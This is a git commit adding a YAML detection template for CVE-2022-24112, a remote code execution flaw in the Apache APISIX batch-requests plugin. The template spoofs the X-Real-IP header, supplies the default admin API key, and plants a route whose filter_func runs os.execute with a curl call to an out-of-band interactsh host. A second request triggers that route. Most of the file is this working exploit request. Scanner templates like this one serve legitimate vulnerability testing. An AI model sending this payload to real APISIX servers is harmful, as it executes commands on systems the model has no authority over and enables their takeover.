add CVE-2022-24112

Signed-off-by: 严州扬 <double_y@buaa.edu.cn>
2023-03-25 14:57:15 +00:00 · 2023-03-25 14:57:15 +00:00 · 4c93049b50
parent bda6792617
commit 4c93049b50
1 changed files with 54 additions and 0 deletions
--- a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml
+++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml
@ -0,0 +1,54 @@
+id: CVE-2022-24112
+
+info:
+  name: Apache APISIX apisix/batch-requests RCE
+  description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+  author: Mr-xn
+  severity: critical
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
+    - https://www.openwall.com/lists/oss-security/2022/02/11/3
+    - https://twitter.com/sirifu4k1/status/1496043663704858625
+    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+
+  tags: cve,cve2022,apache,rce,apisix
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2022-24112
+    cwe-id: CWE-290
+
+requests:
+  - raw:
+    - |
+        POST /apisix/batch-requests HTTP/1.1
+        Host: {{Host}}:9080
+        Content-Type: application/json
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9
+        Connection: close
+
+        {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]}
+    - |
+        GET /api/test HTTP/1.1
+        Host: {{Host}}:9080
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9
+        Connection: close
+
+    redirects: false
+
+    matchers-condition: and
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+          # - "status_code_2 == 404"
+          - 'contains(body_1, "{{randstr}}")'
+          # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")'
+        condition: and
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"